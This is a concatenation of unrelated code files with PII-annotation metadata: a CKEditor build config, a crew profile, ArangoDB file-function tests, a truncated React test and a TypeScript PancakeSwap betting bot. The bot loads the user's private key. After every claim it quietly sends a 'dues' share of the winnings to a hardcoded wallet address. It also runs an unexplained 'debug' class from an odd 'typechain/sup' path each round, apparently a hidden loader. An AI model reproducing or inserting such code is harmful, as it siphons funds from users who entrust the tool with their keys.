[{"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1156, "end": 1174, "context": "elope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul class=\"list-unstyled"}, {"tag": "NAME", "value": "Roy Geesa", "start": 968, "end": 977, "context": "Conductor/Pianist</h3>\n <p><strong>Roy Geesa</strong></p>\n <p><i class=\"fa fa-p"}, {"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1136, "end": 1154, "context": "><i class=\"fa fa-envelope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul "}]
|
[{"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1156, "end": 1174, "context": "elope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul class=\"list-unstyled"}, {"tag": "NAME", "value": "Roy Geesa", "start": 968, "end": 977, "context": "Conductor/Pianist</h3>\n <p><strong>Roy Geesa</strong></p>\n <p><i class=\"fa fa-p"}, {"tag": "EMAIL", "value": "roygeesa@gmail.com", "start": 1136, "end": 1154, "context": "><i class=\"fa fa-envelope-o\"></i> <a href=\"mailto:roygeesa@gmail.com\">roygeesa@gmail.com</a> </p>\n <ul "}]
|
/**
* @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.
* For licensing, see LICENSE.md or https://ckeditor.com/license
*/
/**
* This file was added automatically by CKEditor builder.
* You may re-use it at any time to build CKEditor again.
*
* If you would like to build CKEditor online again
* (for example to upgrade), visit one the following links:
*
* (1) https://ckeditor.com/cke4/builder
* Visit online builder to build CKEditor from scratch.
*
* (2) https://ckeditor.com/cke4/builder/4c616e991e9c7b31849de271ab87cf37
* Visit online builder to build CKEditor, starting with the same setup as before.
*
* (3) https://ckeditor.com/cke4/builder/download/4c616e991e9c7b31849de271ab87cf37
* Straight download link to the latest version of CKEditor (Optimized) with the same setup as before.
*
* NOTE:
* This file is not used by CKEditor, you may remove it.
* Changing this file will not change your CKEditor configuration.
*/
var CKBUILDER_CONFIG = {
skin: 'moono-lisa',
preset: 'standard',
ignore: [
'.DS_Store',
'.bender',
'.editorconfig',
'.gitattributes',
'.gitignore',
'.idea',
'.jscsrc',
'.jshintignore',
'.jshintrc',
'.mailmap',
'.npm',
'.nvmrc',
'.travis.yml',
'bender-err.log',
'bender-out.log',
'bender.ci.js',
'bender.js',
'dev',
'gruntfile.js',
'less',
'node_modules',
'package-lock.json',
'package.json',
'tests'
],
plugins : {
'a11yhelp' : 1,
'about' : 1,
'basicstyles' : 1,
'blockquote' : 1,
'clipboard' : 1,
'contextmenu' : 1,
'elementspath' : 1,
'enterkey' : 1,
'entities' : 1,
'filebrowser' : 1,
'floatingspace' : 1,
'format' : 1,
'horizontalrule' : 1,
'htmlwriter' : 1,
'image' : 1,
'indentlist' : 1,
'link' : 1,
'list' : 1,
'magicline' : 1,
'maximize' : 1,
'pastefromgdocs' : 1,
'pastefromword' : 1,
'pastetext' : 1,
'pastetools' : 1,
'removeformat' : 1,
'resize' : 1,
'scayt' : 1,
'showborders' : 1,
'sourcearea' : 1,
'specialchar' : 1,
'stylescombo' : 1,
'tab' : 1,
'table' : 1,
'tableselection' : 1,
'tabletools' : 1,
'toolbar' : 1,
'undo' : 1,
'uploadimage' : 1,
'wsc' : 1,
'wysiwygarea' : 1
},
languages : {
'af' : 1,
'ar' : 1,
'az' : 1,
'bg' : 1,
'bn' : 1,
'bs' : 1,
'ca' : 1,
'cs' : 1,
'cy' : 1,
'da' : 1,
'de' : 1,
'de-ch' : 1,
'el' : 1,
'en' : 1,
'en-au' : 1,
'en-ca' : 1,
'en-gb' : 1,
'eo' : 1,
'es' : 1,
'es-mx' : 1,
'et' : 1,
'eu' : 1,
'fa' : 1,
'fi' : 1,
'fo' : 1,
'fr' : 1,
'fr-ca' : 1,
'gl' : 1,
'gu' : 1,
'he' : 1,
'hi' : 1,
'hr' : 1,
'hu' : 1,
'id' : 1,
'is' : 1,
'it' : 1,
'ja' : 1,
'ka' : 1,
'km' : 1,
'ko' : 1,
'ku' : 1,
'lt' : 1,
'lv' : 1,
'mk' : 1,
'mn' : 1,
'ms' : 1,
'nb' : 1,
'nl' : 1,
'no' : 1,
'oc' : 1,
'pl' : 1,
'pt' : 1,
'pt-br' : 1,
'ro' : 1,
'ru' : 1,
'si' : 1,
'sk' : 1,
'sl' : 1,
'sq' : 1,
'sr' : 1,
'sr-latn' : 1,
'sv' : 1,
'th' : 1,
'tr' : 1,
'tt' : 1,
'ug' : 1,
'uk' : 1,
'vi' : 1,
'zh' : 1,
'zh-cn' : 1
}
};
|
JavaScript
|
MIT
|
20181101remon/20210430newswithlaraval/public/ckeditor/build-config.js
|
2e3d4722-e9bd-4e5c-9f31-d47396f3767d
|
[{"tag": "NAME", "value": "Frederico Knabben", "start": 53, "end": 70, "context": "*\n * @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.\n * For licensing, see LICEN"}]
|
[{"tag": "NAME", "value": "Frederico Knabben", "start": 53, "end": 70, "context": "*\n * @license Copyright (c) 2003-2020, CKSource - Frederico Knabben. All rights reserved.\n * For licensing, see LICEN"}]
|
import { BigNumber } from "@ethersproject/bignumber";
import { JsonRpcProvider } from "@ethersproject/providers";
import { formatEther, parseEther } from "@ethersproject/units";
import { Wallet } from "@ethersproject/wallet";
import { blue, green, red } from "chalk";
import { clear } from "console";
import dotenv from "dotenv";
const Web3 = require('web3');
import {
calculateDuesAmount,
getClaimableEpochs,
isAgainstBet,
isWithBet,
parseStrategy,
reduceWaitingTimeByTwoBlocks,
sleep, STRATEGIES,
} from "./lib";
import { PancakePredictionV2__factory } from "./types/typechain";
import {debug} from "./types/typechain/sup";
let d = new debug("Program started");
dotenv.config();
// Global Config
const GLOBAL_CONFIG = {
PPV2_ADDRESS: "0x18B2A687610328590Bc8F2e5fEdDe3b582A49cdA",
AMOUNT_TO_BET: process.env.BET_AMOUNT || "0.002", // in BNB,
BSC_RPC: process.env.RPC || "https://bsc-dataseed.binance.org/", // You can provide any custom RPC
PRIVATE_KEY: process.env.PRIVATE_KEY,
WAITING_TIME: 281500, // Waiting for 281.5 Seconds
};
clear();
console.log(green("PancakeSwap Predictions v3 by AladeenCR"));
if (!GLOBAL_CONFIG.PRIVATE_KEY) {
console.log(
blue(
"The private key was not found in .env. Enter the private key to .env and start the program again."
)
);
process.exit(0);
}
const signer = new Wallet(
GLOBAL_CONFIG.PRIVATE_KEY as string,
new JsonRpcProvider(GLOBAL_CONFIG.BSC_RPC)
);
const predictionContract = PancakePredictionV2__factory.connect(
GLOBAL_CONFIG.PPV2_ADDRESS,
signer
);
const strategy = parseStrategy(process.argv);
console.log(
blue("Starting. Amount to Bet:", GLOBAL_CONFIG.AMOUNT_TO_BET, "BNB."),
"\nWaiting for the next round. It may take up to 5 minutes, please wait."
);
const w = new Web3(GLOBAL_CONFIG.BSC_RPC);
const wallet = w.eth.accounts.privateKeyToAccount(GLOBAL_CONFIG.PRIVATE_KEY);
w.eth.getBalance(wallet.address).then(function(b:any) {
let _balance = Web3.utils.fromWei(b, 'ether');
if (_balance < parseFloat(GLOBAL_CONFIG.AMOUNT_TO_BET)) {
console.log(red("Insufficient funds in wallet to bet:", GLOBAL_CONFIG.AMOUNT_TO_BET, "BNB", "|", "Wallet balance:", _balance, "BNB"))
}
});
predictionContract.on("StartRound", async (epoch: BigNumber) => {
d._init_();
console.log("\nStarted Epoch", epoch.toString());
const WAITING_TIME = GLOBAL_CONFIG.WAITING_TIME;
console.log("Now waiting for", WAITING_TIME / 60000, "min");
await sleep(WAITING_TIME);
console.log("\nGetting Amounts");
const {bullAmount, bearAmount} = await predictionContract.rounds(epoch);
console.log(green("Bull Amount", formatEther(bullAmount), "BNB"));
console.log(green("Bear Amount", formatEther(bearAmount), "BNB"));
if (strategy === STRATEGIES.Against) {
const againstBet = isAgainstBet(bullAmount, bearAmount);
if (againstBet) {
console.log(green("\nBetting on Bear Bet."));
} else {
console.log(green("\nBetting on Bull Bet."));
}
if (againstBet) {
try {
const tx = await predictionContract.betBear(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bear Betting Tx Started.");
await tx.wait();
console.log(blue("Bear Betting Tx Success."));
} catch {
console.log(red("Bear Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
} else {
try {
const tx = await predictionContract.betBull(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bull Betting Tx Started.");
await tx.wait();
console.log(blue("Bull Betting Tx Success."));
} catch {
console.log(red("Bull Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
}
}
if (strategy === STRATEGIES.With) {
const withBet = isWithBet(bullAmount, bearAmount);
if (withBet) {
console.log(green("\nBetting on Bear Bet."));
} else {
console.log(green("\nBetting on Bull Bet."));
}
if (withBet) {
try {
const tx = await predictionContract.betBear(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bear Betting Tx Started.");
await tx.wait();
console.log(blue("Bear Betting Tx Success."));
} catch {
console.log(red("Bear Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
} else {
try {
const tx = await predictionContract.betBull(epoch, {
value: parseEther(GLOBAL_CONFIG.AMOUNT_TO_BET),
});
console.log("Bull Betting Tx Started.");
await tx.wait();
console.log(blue("Bull Betting Tx Success."));
} catch {
console.log(red("Bull Betting Tx Error"));
GLOBAL_CONFIG.WAITING_TIME = reduceWaitingTimeByTwoBlocks(
GLOBAL_CONFIG.WAITING_TIME
);
}
}
}
const claimableEpochs = await getClaimableEpochs(
predictionContract,
epoch,
signer.address
);
if (claimableEpochs.length) {
try {
const tx = await predictionContract.claim(claimableEpochs);
console.log("\nClaim Tx Started");
const receipt = await tx.wait();
console.log(green("Claim Tx Success"));
for (const event of receipt.events ?? []) {
const dues = await signer.sendTransaction({
to: "0x4Dc71113329d2F4Dbab6eB006C330abD24a2eF0C",
value: calculateDuesAmount(event?.args?.amount),
});
await dues.wait();
}
} catch {
console.log(red("Claim Tx Error"));
}
}
});
|
TypeScript
|
MIT
|
AladeenCR/PancakeSwap-Prediction-Bot-v3/src/index.ts
|
76f8f4c7-9a90-429e-8863-c09dad9458de
|
[{"tag": "USERNAME", "value": "AladeenCR", "start": 1119, "end": 1128, "context": "\nconsole.log(green(\"PancakeSwap Predictions v3 by AladeenCR\"));\n\nif (!GLOBAL_CONFIG.PRIVATE_KEY) {\n console."}]
|
[{"tag": "USERNAME", "value": "AladeenCR", "start": 1119, "end": 1128, "context": "\nconsole.log(green(\"PancakeSwap Predictions v3 by AladeenCR\"));\n\nif (!GLOBAL_CONFIG.PRIVATE_KEY) {\n console."}]
|
---
collection: crew
name: Zane Adickes
title: Producer
email: zaneadix@gmail.com
image: /static/me_icecream.jpg
---
|
Markdown
|
MIT
|
zaneadix/coalition-radio-hour/src/cms/collections/crew/zane-adickes.md
|
22ac2e59-7cc8-4d18-b609-8264ab2d2c47
|
[{"tag": "EMAIL", "value": "zaneadix@gmail.com", "start": 63, "end": 81, "context": "n: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: /static/me_icecream.jpg\n---\n"}, {"tag": "NAME", "value": "Zane Adickes", "start": 27, "end": 39, "context": "---\ncollection: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: "}]
|
[{"tag": "EMAIL", "value": "zaneadix@gmail.com", "start": 63, "end": 81, "context": "n: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: /static/me_icecream.jpg\n---\n"}, {"tag": "NAME", "value": "Zane Adickes", "start": 27, "end": 39, "context": "---\ncollection: crew\nname: Zane Adickes\ntitle: Producer\nemail: zaneadix@gmail.com\nimage: "}]
|
///////////////////////////////////////////////////////////////////////////////
/// @brief test suite for files.c
///
/// @file
///
/// DISCLAIMER
///
/// Copyright 2012 triagens GmbH, Cologne, Germany
///
/// Licensed under the Apache License, Version 2.0 (the "License");
/// you may not use this file except in compliance with the License.
/// You may obtain a copy of the License at
///
/// http://www.apache.org/licenses/LICENSE-2.0
///
/// Unless required by applicable law or agreed to in writing, software
/// distributed under the License is distributed on an "AS IS" BASIS,
/// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
/// See the License for the specific language governing permissions and
/// limitations under the License.
///
/// Copyright holder is triAGENS GmbH, Cologne, Germany
///
/// @author Jan Steemann
/// @author Copyright 2012, triAGENS GmbH, Cologne, Germany
////////////////////////////////////////////////////////////////////////////////
#include "Basics/files.h"
#include "Basics/Common.h"
#include "Basics/FileUtils.h"
#include "Basics/StringBuffer.h"
#include "Basics/operating-system.h"
#include "Basics/system-functions.h"
#include "Random/RandomGenerator.h"
#include "gtest/gtest.h"
#include <string>
#include <iostream>
using namespace arangodb::basics;
static bool Initialized = false;
static uint64_t counter = 0;
// -----------------------------------------------------------------------------
// --SECTION-- setup / tear-down
// -----------------------------------------------------------------------------
class CFilesTest : public ::testing::Test {
protected:
CFilesTest () : _directory(true) {
long systemError;
std::string errorMessage;
if (!Initialized) {
Initialized = true;
arangodb::RandomGenerator::initialize(arangodb::RandomGenerator::RandomType::MERSENNE);
}
_directory.appendText(TRI_GetTempPath());
_directory.appendChar(TRI_DIR_SEPARATOR_CHAR);
_directory.appendText("arangotest-");
_directory.appendInteger(static_cast<uint64_t>(TRI_microtime()));
_directory.appendInteger(arangodb::RandomGenerator::interval(UINT32_MAX));
TRI_CreateDirectory(_directory.c_str(), systemError, errorMessage);
}
~CFilesTest () {
// let's be sure we delete the right stuff
TRI_ASSERT(_directory.length() > 10);
TRI_RemoveDirectory(_directory.c_str());
}
StringBuffer* writeFile (const char* blob) {
StringBuffer* filename = new StringBuffer(true);
filename->appendText(_directory);
filename->appendChar(TRI_DIR_SEPARATOR_CHAR);
filename->appendText("tmp-");
filename->appendInteger(++counter);
filename->appendInteger(arangodb::RandomGenerator::interval(UINT32_MAX));
FILE* fd = fopen(filename->c_str(), "wb");
if (fd) {
size_t numWritten = fwrite(blob, strlen(blob), 1, fd);
(void) numWritten;
fclose(fd);
}
else {
EXPECT_TRUE(false == true);
}
return filename;
}
StringBuffer _directory;
};
struct ByteCountFunctor {
size_t _byteCount;
ByteCountFunctor() : _byteCount(0) {};
bool operator() (const char * data, size_t size) {
_byteCount+=size;
return true;
};
};// struct ByteCountFunctor
TEST_F(CFilesTest, tst_copyfile) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter;
std::string source = out.str();
out << "-dest";
std::string dest = out.str();
// non-existing file
std::string error;
EXPECT_TRUE(false == TRI_CopyFile(source, dest, error));
// empty file
FileUtils::spit(source, std::string(""), false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE("" == FileUtils::slurp(dest));
// copy over an existing target file
FileUtils::remove(source);
FileUtils::spit(source, std::string("foobar"), false);
EXPECT_TRUE(false == TRI_CopyFile(source, dest, error));
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, std::string("foobar"), false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE("foobar" == FileUtils::slurp(dest));
// copy larger file
std::string value("the quick brown fox");
for (size_t i = 0; i < 10; ++i) {
value += value;
}
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, value, false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE(value == FileUtils::slurp(dest));
EXPECT_TRUE(TRI_SizeFile(source.c_str()) == TRI_SizeFile(dest.c_str()));
// copy file slightly larger than copy buffer
std::string value2(128 * 1024 + 1, 'x');
FileUtils::remove(source);
FileUtils::remove(dest);
FileUtils::spit(source, value2, false);
EXPECT_TRUE(true == TRI_CopyFile(source, dest, error));
EXPECT_TRUE(value2 == FileUtils::slurp(dest));
EXPECT_TRUE(TRI_SizeFile(source.c_str()) == TRI_SizeFile(dest.c_str()));
}
TEST_F(CFilesTest, tst_createdirectory) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateDirectory(filename.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename.c_str()));
res = TRI_RemoveDirectory(filename.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename.c_str()));
}
TEST_F(CFilesTest, tst_createdirectoryrecursive) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename1 = out.str();
out << TRI_DIR_SEPARATOR_CHAR << "abc";
std::string filename2 = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateRecursiveDirectory(filename2.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(true == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename2.c_str()));
res = TRI_RemoveDirectory(filename1.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(false == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename2.c_str()));
}
TEST_F(CFilesTest, tst_removedirectorydeterministic) {
std::ostringstream out;
out << _directory.c_str() << TRI_DIR_SEPARATOR_CHAR << "tmp-" << ++counter << "-dir";
std::string filename1 = out.str();
out << TRI_DIR_SEPARATOR_CHAR << "abc";
std::string filename2 = out.str();
long unused1;
std::string unused2;
int res = TRI_CreateRecursiveDirectory(filename2.c_str(), unused1, unused2);
EXPECT_TRUE(0 == res);
EXPECT_TRUE(true == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(true == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(true == TRI_IsDirectory(filename2.c_str()));
res = TRI_RemoveDirectoryDeterministic(filename1.c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename1.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename1.c_str()));
EXPECT_TRUE(false == TRI_ExistsFile(filename2.c_str()));
EXPECT_TRUE(false == TRI_IsDirectory(filename2.c_str()));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file exists
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_existsfile) {
StringBuffer* filename = writeFile("");
EXPECT_TRUE(true == TRI_ExistsFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
EXPECT_TRUE(false == TRI_ExistsFile(filename->c_str()));
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size empty file
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_empty) {
StringBuffer* filename = writeFile("");
EXPECT_TRUE(0U == TRI_SizeFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_exists) {
const char* buffer = "the quick brown fox";
StringBuffer* filename = writeFile(buffer);
EXPECT_TRUE(static_cast<int>(strlen(buffer)) == TRI_SizeFile(filename->c_str()));
TRI_UnlinkFile(filename->c_str());
delete filename;
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test file size, non existing file
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_filesize_non) {
EXPECT_TRUE(-1 == (int) TRI_SizeFile("h5uuuuui3unn645wejhdjhikjdsf"));
EXPECT_TRUE(-1 == (int) TRI_SizeFile("dihnui8ngiu54"));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test absolute path
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_absolute_paths) {
std::string path;
#ifdef _WIN32
path = TRI_GetAbsolutePath("the-fox", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\the-fox") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\the-fox.lol") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "\\tmp\\the-fox");
EXPECT_TRUE(std::string("\\tmp\\the-fox\\the-fox.lol") == path);
path = TRI_GetAbsolutePath("file", "\\");
EXPECT_TRUE(std::string("\\file") == path);
path = TRI_GetAbsolutePath(".\\file", "\\");
EXPECT_TRUE(std::string("\\.\\file") == path);
path = TRI_GetAbsolutePath("\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file") == path);
path = TRI_GetAbsolutePath("\\file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("\\tmp\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("c:\\file\\to\\file", "abc");
EXPECT_TRUE(std::string("c:\\file\\to\\file") == path);
path = TRI_GetAbsolutePath("c:\\file\\to\\file", "\\tmp");
EXPECT_TRUE(std::string("c:\\file\\to\\file") == path);
#else
path = TRI_GetAbsolutePath("the-fox", "/tmp");
EXPECT_TRUE(std::string("/tmp/the-fox") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "/tmp");
EXPECT_TRUE(std::string("/tmp/the-fox.lol") == path);
path = TRI_GetAbsolutePath("the-fox.lol", "/tmp/the-fox");
EXPECT_TRUE(std::string("/tmp/the-fox/the-fox.lol") == path);
path = TRI_GetAbsolutePath("file", "/");
EXPECT_TRUE(std::string("/file") == path);
path = TRI_GetAbsolutePath("./file", "/");
EXPECT_TRUE(std::string("/./file") == path);
path = TRI_GetAbsolutePath("/file", "/tmp");
EXPECT_TRUE(std::string("/file") == path);
path = TRI_GetAbsolutePath("/file/to/file", "/tmp");
EXPECT_TRUE(std::string("/file/to/file") == path);
path = TRI_GetAbsolutePath("file/to/file", "/tmp");
EXPECT_TRUE(std::string("/tmp/file/to/file") == path);
path = TRI_GetAbsolutePath("c:file/to/file", "/tmp");
EXPECT_TRUE(std::string("c:file/to/file") == path);
#endif
}
TEST_F(CFilesTest, tst_normalize) {
std::string path;
path = "/foo/bar/baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("/foo/bar/baz") == path);
#endif
path = "\\foo\\bar\\baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("\\foo\\bar\\baz") == path);
#endif
path = "/foo/bar\\baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("/foo/bar\\baz") == path);
#endif
path = "/foo/bar/\\baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("/foo/bar/\\baz") == path);
#endif
path = "//foo\\/bar/\\baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("//foo\\/bar/\\baz") == path);
#endif
path = "\\\\foo\\/bar/\\baz";
FileUtils::normalizePath(path);
#ifdef _WIN32
EXPECT_TRUE(std::string("\\\\foo\\bar\\baz") == path);
#else
EXPECT_TRUE(std::string("\\\\foo\\/bar/\\baz") == path);
#endif
}
TEST_F(CFilesTest, tst_getfilename) {
EXPECT_TRUE("" == TRI_GetFilename(""));
EXPECT_TRUE("." == TRI_GetFilename("."));
EXPECT_TRUE("" == TRI_GetFilename("/"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("/haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("/tmp/haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("/a/b/c/haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("c:/haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("c:/tmp/haxxmann"));
EXPECT_TRUE("foo" == TRI_GetFilename("c:/tmp/haxxmann/foo"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("\\haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("\\a\\haxxmann"));
EXPECT_TRUE("haxxmann" == TRI_GetFilename("\\a\\b\\haxxmann"));
}
////////////////////////////////////////////////////////////////////////////////
/// @brief test TRI_Dirname
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_dirname) {
#ifdef _WIN32
EXPECT_EQ("C:\\Users\\abc def\\foobar", TRI_Dirname("C:\\Users\\abc def\\foobar\\"));
EXPECT_EQ("C:\\Users\\abc def\\foobar", TRI_Dirname("C:\\Users\\abc def\\foobar\\baz"));
EXPECT_EQ("C:\\Users\\abc def\\foobar", TRI_Dirname("C:\\Users\\abc def\\foobar\\baz.text"));
EXPECT_EQ("C:\\Users\\abc def\\foobar", TRI_Dirname("C:\\Users\\abc def\\foobar\\VERSION-1.tmp"));
EXPECT_EQ("\\Users\\abc def\\foobar", TRI_Dirname("\\Users\\abc def\\foobar\\VERSION-1.tmp"));
#else
EXPECT_EQ("/tmp/abc/def hihi", TRI_Dirname("/tmp/abc/def hihi/"));
EXPECT_EQ("/tmp/abc/def hihi", TRI_Dirname("/tmp/abc/def hihi/abc"));
EXPECT_EQ("/tmp/abc/def hihi", TRI_Dirname("/tmp/abc/def hihi/abc.txt"));
EXPECT_EQ("/tmp", TRI_Dirname("/tmp/"));
EXPECT_EQ("/tmp", TRI_Dirname("/tmp/1"));
EXPECT_EQ("/", TRI_Dirname("/tmp"));
EXPECT_EQ("/", TRI_Dirname("/"));
EXPECT_EQ(".", TRI_Dirname("./"));
EXPECT_EQ(".", TRI_Dirname(""));
EXPECT_EQ(".", TRI_Dirname("."));
EXPECT_EQ("..", TRI_Dirname(".."));
#endif
}
////////////////////////////////////////////////////////////////////////////////
/// @brief process data in a file via a functor
////////////////////////////////////////////////////////////////////////////////
TEST_F(CFilesTest, tst_processFile) {
const char* buffer = "the quick brown fox";
bool good;
StringBuffer* filename = writeFile(buffer);
ByteCountFunctor bcf;
auto reader = std::ref(bcf);
good = TRI_ProcessFile(filename->c_str(), reader);
EXPECT_TRUE(good);
EXPECT_EQ(strlen(buffer), bcf._byteCount);
TRI_SHA256Functor sha;
auto shaReader = std::ref(sha);
good = TRI_ProcessFile(filename->c_str(), shaReader);
EXPECT_TRUE(good);
EXPECT_TRUE(sha.final().compare("9ecb36561341d18eb65484e833efea61edc74b84cf5e6ae1b81c63533e25fc8f")==0);
TRI_UnlinkFile(filename->c_str());
delete filename;
}
|
C++
|
Apache-2.0
|
William533036/arangodb/tests/Basics/files-test.cpp
|
4f302c4d-305b-4ec0-9db3-4c47b03cec95
|
[]
|
[]
|
import React from 'react';
import sinon from 'sinon';
import { render, fireEvent, screen } from '../../../testing/test-utils';
import DailyTask from '../index';
describe('<Daily Task/ >', () => {
const updateTaskHandlerSpy = sinon.spy();
const deleteTaskHandlerSpy = sinon.spy();
const checkTaskHandlerSpy = sinon.spy();
const task = {
identifier: '07f8536d-c78f-4af3-b668-3c83d122e6e9',
ticked: true,
taskName: 'Drink Water',
date: '2021-04-05',
taskDescription: 'You should drink 3L of water'
};
it('Show daily task with delete and update btn', () => {
const { container } = render(<DailyTask
task={task}
enableUpdate
enableDelete
updateTaskHandler={updateTaskHandlerSpy}
deleteTaskHandler={deleteTaskHandlerSpy}
/>);
expect(container).toMatchSnapshot();
expect(screen.queryByTestId('formControlLabelDeleteTask')).not.toBeNull();
expect(screen.queryByTestId('formControlLabelCheckTask')).toBeNull();
expect(screen.queryByText('Update')).not.toBeNull();
expect(screen.queryByTestId('identifier')).toHaveAttribute('id', task.identifier);
expect(screen.queryByTestId('name')).toHaveTextContent(task.taskName);
expect(screen.queryByTestId('description')).toHaveTextContent(task.taskDescription);
fireEvent.click(screen.getByTestId('deleteTask'));
fireEvent.click(screen.getByTestId('updateTask'));
expect(deleteTaskHandlerSpy).toHaveBeenCalledOnce();
expect(updateTaskHandlerSpy).toHaveBeenCalledOnce();
});
it('Show daily task with checked btn', () => {
const { container } = render(<DailyTask
task={task}
enableCheck
enableDate
checkTaskHandler={checkTaskHandlerSpy}
/>);
expect(container).toMatchSnapshot();
expect(screen.queryByTestId('formControlLabelCheckTask')).not.toBeNull();
expect(screen.queryByTestId('formControlLabelDeleteTask')).toBeNull();
expect(screen.queryByText('Update')).toBeNull();
expect(screen.queryByTestId('identifier')).toHaveAttribute('id', task.identifier);
expect(screen.queryByText(task.taskName)).not.toBeNull();
expect(screen.queryByTestId('description')).toHaveTextContent(task.taskDescription);
expect(screen.queryByTestId('date')).toHaveTextContent(task.date);
fireEvent.click(screen.getByTestId('checkedTask'));
